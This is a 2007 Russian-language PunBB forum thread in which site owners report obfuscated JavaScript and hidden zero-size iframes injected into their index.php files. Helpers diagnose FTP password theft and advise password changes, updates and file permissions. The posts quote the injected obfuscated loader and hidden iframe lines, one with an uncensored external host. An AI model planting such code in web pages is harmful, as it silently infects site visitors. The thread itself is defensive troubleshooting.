Быстрый лёгкий надёжный форумный движок
Вы не вошли.
Страницы 1
Тема закрыта
Проблема: в коде страниц форума постоянно появляется следующее:
<!-- o65 --><script language='JavaScript'><!--
function nbsp() {var t,o,l,i,j;var s='';s+=[censored];
s+=[censored];
s=s+[censored];
s=s+[censored];
t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();
//--></script><!-- c65 -->
форум не работает...
при удалении этого кода все нормально... Что делать?
1. не вставлять этот код в форум.
2. обратится с этим к разработчикам вставляемого кода
3. попробовать вставить так чтобы это не появлялось
merida
*.h1*.ru ? хостинг?
merida, вы неправильно выбрали раздел форума. эта тема относится к БЕСПЛАТНОМУ ХОСТИНГУ, о чем надо было сразу честно написать!
ей место в "Свободной теме". а еще лучше - на форуме хостера. наверняка они знают решение.
кусать руку дающего дело неблагодарное. заблокируют ваш сайт и все закончится
merida, вы неправильно выбрали раздел форума. эта тема относится к БЕСПЛАТНОМУ ХОСТИНГУ, о чем надо было сразу честно написать!
ей место в "Свободной теме". а еще лучше - на форуме хостера. наверняка они знают решение.
кусать руку дающего дело неблагодарное. заблокируют ваш сайт и все закончится
Хостинг платный вот в чем дело! А код появляется сам и неизвестно откуда...
одно из двух: либо этот несчастный подвергся XSS атаке, либо merida сам злобный кулхацкер. устроил тут провокацию. на всякий случай я забаню мериду!
а вот секретный код, который пытливый участник нашего форума потенциально мог выполнить в своем браузере:
<iframe src='http://[censored]/mpack/index.php' width=0 height=0 frameborder='0'></iframe>
понятно, что какой-то недружелюбный контент должен открыться у вас. например куки ваши кто-то почитает
Добавлено спустя 23 минуты 35 секунд:
был когда-то прикол на линуксовых форумах. какой-то шутник предлагал расшифровать сложное регулярное выражение на perl. приводилась строка. в итоге если код запускал админ с правами рута, сносились все директории начиная с корня очень смешная шутка. так и здесь - мы не знаем с чем имеем дело, возможно лучше этого не знать.
если merida пострадалец - найдет способ списаться с нами лично. форум не надо загаживать!
Хм. Под видом wmv подсовывется что-то непонятное. В ие пытается загрузиться компонент, после повторной загрузки страницы выдается :[
Я думаю адрес автора следует передать в управление Р, пусть там разбираются кто и зачем загружает код на удаленный компьютер. Это уже состав для статьи.
Я не буду приводить код, чтобы меня ненароком не забанили, но у меня целый день такая же проблема, как у merida.
На каждой странице с именем index в конце появляется код iframe, разумеется, форум после этого не грузится. Я 1. не вставляю сама этот код в форум, мне надо, чтобы форум работал, а не валялся; 2. не могу обратиться с вопросом к разработчикам кода, потому что я не знаю, что это за тля поганит мой форум, а если бы я ее нашла... 3. не могу попробовать вставить так, чтобы это не появлялось, потому что как раз я ничего не вставляю. Я убираю эту гадость, тогда все начинает работать. До следующего захода этого нехорошего человека.
Я так понимаю, что в коде форума какая-то дыыырочка. Потому как админский пароль сгенерированый, пару раз уже поменяный, в куках несохраняемый, значит заходят не через него. Хост платный. Хостер, соответственно, не несет никакой ответственности за повешенные скрипты. Пожалуйста, не подскажете, как справиться с этой напастью?
Встречался с такой проблемой, когда был взломан хостер, на всех сайт которые у него хостились появлялся подобный код, попробуйте удалить его и выставить права для файлов 444
И обратится конечно же к хостеру.
Редактировался FedKoFF (2007-05-29 22:52:58)
хостера надо поставить в известность обязательно! грамотный суппорт вычислит кто и когда изменил файл. по-крайней мере сузят круг для поиска.
покачто нет оснований думать, что дыра в самом punbb. на всякий случай скажите какие у вас моды установлены.
Большое спасибо!
Все сделала, посмотрим, что будет завтра и чем поможет мне хостер.
Добавлено спустя 21 минуту 39 секунд:
покачто нет оснований думать, что дыра в самом punbb
Я только обеими руками за, чтобы кто-то молодой и ретивый не нашел лазейку в движке
Я понимаю, что это звучит идиотически, но я, к сожалению, все еще очень плохо разбираюсь в php. Я не рискнула поставить сборку - Сборка нашего форума - доводить до ума - не с моим уровнем подготовки и сейчас, а уж что говорить о том времени, когда я только ставила этот движок. Я скачала официальную версию PunBB 1.2.12 + русский язык.
Спасибо Вам за пинок! Пошла качать последнюю версию и обновляться.
Сборка этого форума как раз и предназначена для людей "плохо разбирающихся в php", самые нужные моды там уже поставлены и не надо ковыряться в коде для их установки.
Я попробую проапдейтить форум. Если что не будет получаться - попрошу помощи в соответствующем разделе этого форума. Всем большое спасибо за быстрое реагирование и советы!
P.S. Обожаю техподдержку хостеров. "В первую очередь неоходимо проверить все содержимое сайта и удалить
вирусы. Далее обновить версию форума и изменить пароль через панель управления. Желательно включить "Управление необработанными логами" в панели управления, для выявления причины взлома, если он повториться в будущем. А так же проверить свой личный компьютер на наличие вирусов."
Я, конечно, не гений, но письма пишу вроде бы по-русски и вирусов на личном компе не держу. А если они на том, что лежит в сети, разве это не проблема хостера?
Простите, если это не по теме. Больше флудить не буду.
Проблема хостера тогда, когда злоумышленники получают доступ к ресурсам по их вине, например они неправильно настроили безопасность. В противном случае это не их проблема. Интересно посмотреть на твой форум. Ссылку нельзя дать?
люди хелп... у меня стоит мкпортал в корневой, и этот форум в папке forum1 вчера снесли в корневой индекс пхп напроч, зашла утром ничего не грузится лезу по фтп страница индекс пхп 0 байт... залилу по-новой, сегодня утром зашла у меня форум не грузится, достала индекс пхп сравнила с индекс пхп из дистрибутива там в самом конце строка добавлена
<iframe
src="http://milla-model.hut2.ru/index.html" width="0" height="0" style="display:none"></iframe>
удалила ее все загрузилось
но что это так и будет продолжаться? ((
вот же уроды какие
кстате читат лул интересную тему - анти ддос: http://forum.omsk.com/viewtopic.php?t=47114
насколько это правильно/трудоёмко/актуально?
непонимаю смысла этой защиты. они борются со следствием,а при досе это бесполезно и бесмыслено.
как же спастить от ддос?
только пережидать?
похоже очень многие подвергаются подобной атаке. судя по обсуждению на форумах это не изъян конкретного скрипта или хостинга, а кража пароля трояном. вот одно из сообщений: http://peterhost.ru/forum/viewtopic.php?t=5727
троян приползает через этот самый "левый" iframe к посетителям сломанного сайта.
есть подозрения, что пароли крадутся из сохраненных в Total Commander.
решение - меняйте пароли, не сохраняйте их в настройках ftp-клиентов, а держите на бумаге или в картинках в надежном месте, ставьте антивирусники и файрволы!
я снял бан с merida, всех пользователей предупреждаю - не цитируйте целиком хакерский код. не надо помогать хакерам распостранять гадость! достаточно небольшого фрагмента и описания проблемы.
дополнение к вышесказанному: переходите на линуксы
кстате у меня тоже было нечто подобное, месяца два назад
в индекс.пхп вконец тоже ставился фрейм чёта там грузилось с него, но всё работало
всё исчезло как поменял пароли : ))
хоть и не юзаю TC =\
жду ibm t41 - на него поставлю дибо дебиан 4, либо генту...
виндовс - гудбай.
тока не понял прчем тут фтп?
ддос это када твой сайт хостер отрубает, оптом атака кончается, и он включает... - покраней мере со стороны юзера - так.
а всё понял - тема то не про ддос....
Редактировался niikto (2007-06-21 15:40:08)
niiko, а причем тут дос? топик про внедрение чужого кода в index
ага, я уже выше написал
Страницы 1
Тема закрыта